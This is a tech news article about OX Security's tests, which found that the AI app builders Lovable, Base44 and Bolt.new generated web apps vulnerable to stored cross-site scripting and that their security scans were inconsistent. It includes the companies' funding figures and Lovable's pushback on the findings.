Lovable apps may be dangerous by design, research finds
AI app builders are exploding in value, but new tests reveal they may be silently shipping dangerous code into the wild.
Nvidia CEO Jensen Huang recently told CNBC, "I love Lovable!"
He named the AI app builder as one of the fastest-growing companies in enterprise AI, noting that all NVIDIA engineers are now using AI coders.
AI coding apps are booming. Lovable reportedly raised $200 million at a $1.8 billion valuation within eight months of launch. Base44, a solo project, was sold to Wix for $80 million in June, while Bolt raised $105.5 million at a $700 million valuation in January 2025.
However, the security of AI-generated code still remains a cybersecurity nightmare, with a new test by OX Security raising alarms about the safety of AI app builders.
Findings show that Lovable, Base44, and Bolt.new generated web apps with exploitable vulnerabilities even when users asked for “secure” code.
The report argues that built-in security checks, such as the security scan conducted before publishing on Loveable, are inconsistent, as they catch vulnerabilities only 66% of the time. Meanwhile, Bolt’s scan failed to identify the vulnerability at all.
“Inconsistent detection is worse than no detection at all – as it creates a false confidence while providing unreliable protection,” the researchers said in the report.
AI builders create apps that are vulnerable to attacks
OX tested AI platforms by asking them to create a wiki app with HTML editing functionalities across three platforms.
All platforms provided a rich-text/HTML editor that stored and rendered user input. However, across all of them, a core vulnerability was found. The code was vulnerable to stored cross-site scripting (XSS), allowing attackers to inject malicious HTML, hijack sessions, and steal data.
In the second test, researchers prompted AI to “secure” the code. While simply asking to secure the code, all three AI platforms failed to clear the code. However, when researchers specifically explained the security-related steps that needed to be taken, AI builders partly responded and secured the code.
These findings are significant, as AI builders lower the barrier to publishing apps, potentially multiplying the number of vulnerable deployments.
Non-technical creators are least equipped to detect security gaps, yet they are most likely to trust “Security Check: Passed” badges that are falsely provided by AI builders.“The failure was not in the app’s features, as requested by the user, but in the underlying framework logic provided by the AI App Builder itself,” the report states.
However, the companies behind the apps pushed back on the discoveries, indicating that the issue was app-specific, not platform-level. “After review, there doesn't seem to be any significant security impact as a result of the behavior you are describing. This is an application generated by Lovable – any misconfiguration on this is not part of our program Scope," Lovable said in response to the report.
Unlock more exclusive Cybernews content on YouTube
